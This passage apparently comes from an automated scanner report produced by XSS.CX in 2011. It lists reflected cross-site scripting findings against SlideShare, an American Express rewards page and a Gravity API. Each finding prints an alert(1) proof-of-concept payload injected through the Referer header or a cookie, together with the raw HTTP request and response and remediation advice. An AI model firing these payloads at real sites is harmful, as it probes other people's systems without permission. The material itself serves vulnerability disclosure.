Set-Cookie: scribd_rtc=Cb7oUMbU8DbGGQU%2FxKWRtVIJfC6%2FuC5QbHInhvEzv6R020imGDNw%2FVDIekZm1cBqpO2My7np%2FOrgUprQnDYsuzBRI3Y9yVn1qCRLJAx5ZgP73SsdxVcv3s9wdyMGwaqFA9Co7%2FVtD55mVOti24zwojxzzHJB3OzcJdpm75UFtQcWvyYNW7dzLvReXrNqpSTGWt53r85QgpVPJb8CQ6Ad1TAGx65qDz9OgY3%2BK%2FcJ7AWrzaLCX0%2FRwLUMHuHYs0m52Z3Z6pE1Lo6BjlJW%2BlHZBJtNmq7%2Fdss8Ahm1P9%2FQhnE9xTiY17SssSkduJDAKj9kISqKdZUbiDrk2yOa8AzqXaawTy5%2BOHTGnHPtpAad4oPcycMKv239YH6pGf4gchkf-W2Z%2FYCDNrxf8macK5kBr%2FmuuaCY%3D; domain=.scribd.com; path=/; expires=Tue, 06 Oct 2026 17:58:50 GMT
Status: 200 OK
X-Served-By: backend
X-Fastcookie: rails
Content-Length: 40555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

xmlns:og="
...[SNIP]...
bleInstantConnect = true;
Scribd.Facebook.requestEnableInstantConnect = true;
Scribd.Facebook.beforeFacebookInitialize();

   Scribd.Request = {
       referrer: 'http://www.google.com/search?hl=en&q=9e040'-alert(1)-'80f1fd50ffd',
       controller: 'static',
       action: 'about'
   };
   
// This calls the initialization once Facebook libraries are loaded
window.fbAsyncInit = Scribd.Facebook.initializeConnect.bind(Scribd.Faceboo
...[SNIP]...

1.76. http://www.slideshare.net/slideshow/embed_code/9446735 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /slideshow/embed_code/9446735

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dc45"-alert(1)-"51b244a5ea4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /slideshow/embed_code/9446735 HTTP/1.1
Host: www.slideshare.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=7dc45"-alert(1)-"51b244a5ea4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-911077789-1315762526145; __utma=187450090.50813759.1315762522.1315762522.1315762526.1; __utmz=187450090.1315762529.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=%5Dvmlf; __utmv=187450090.non-member

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html; charset=utf-8
Status: 200 OK
X-XSS-Protection: 0
X-Bench-Route: slideshow/embed_code
X-Runtime: 15
cache-control: private, no-cache, must-revalidate, must-revalidate
Content-Length: 1583
Date: Thu, 06 Oct 2011 17:54:21 GMT
X-Varnish: 1835434780
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>A Mobile
...[SNIP]...
iable("userName", "360i")

so.addVariable("hostedIn", "iframe")

so.addVariable("show_branding", "1")

so.addVariable("iframe_host", "http://www.google.com/search?hl=en&q=7dc45"-alert(1)-"51b244a5ea4")

so.addVariable("fullscreen_bg_color", "White")

so.addVariable("doc", "clientsummit2011-dberkowitzfinal-110927130157-phpapp02")

so.addVariable("version_no", "13171470
...[SNIP]...

1.77. https://rewards.americanexpress.com/myca/loyalty/us/rewards/redirect/nonsecureredirect [SaneID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://rewards.americanexpress.com
Path:   /myca/loyalty/us/rewards/redirect/nonsecureredirect

Issue detail

The value of the SaneID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b02"><script>alert(1)</script>46627ffb0fe was submitted in the SaneID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /myca/loyalty/us/rewards/redirect/nonsecureredirect?request_type=un_sso&target=https%3a%2f%2fwww.membershiprewards.com%2fmyca%2fProcess.aspx&src=mrc HTTP/1.1
Host: rewards.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-131553061363460711b02"><script>alert(1)</script>46627ffb0fe; NSC_nf3-x-sx-bddu-c=ffffffff97a3d17245525d5f4f58455e445a4a428581; sroute=252578314.58148.0000; bandwidthdetect=vhigh; TrackingId=50.23.123.106-1315530613634607; mbox=check#true#1317935504|session#1317935443061-430884#1317937304

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 21:11:32 GMT
Server: IBM_HTTP_Server
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 284


<html>
<head>
<meta http-equiv="Refresh" content="1; url=https://www.membershiprewards.com/myca/Process.aspx?stoken=null&mrIndex=null&mrk=null&MR=null&mrcnt=0&sid=50.23.123.106-131553061363460711b02"><script>alert(1)</script>46627ffb0fe&rc=&mrcards=">
...[SNIP]...

1.78. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload d5ce1<script>alert(1)</script>6c4c2a73044 was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.scribd.com/embeds/37405970/content?view_mode=list&start_page=1&access_key=key-1l135y5z110uoa6o7t5r&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839d5ce1<script>alert(1)</script>6c4c2a73044

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Thu, 06 Oct 2011 17:56:57 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839d5ce1<script>alert(1)</script>6c4c2a73044; Domain=.gravity.com; Expires=Mon, 09-Jul-2063 11:53:54 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839d5ce1<script>alert(1)</script>6c4c2a73044');

Report generated by XSS.CX at Thu Oct 06 16:15:30 CDT 2011.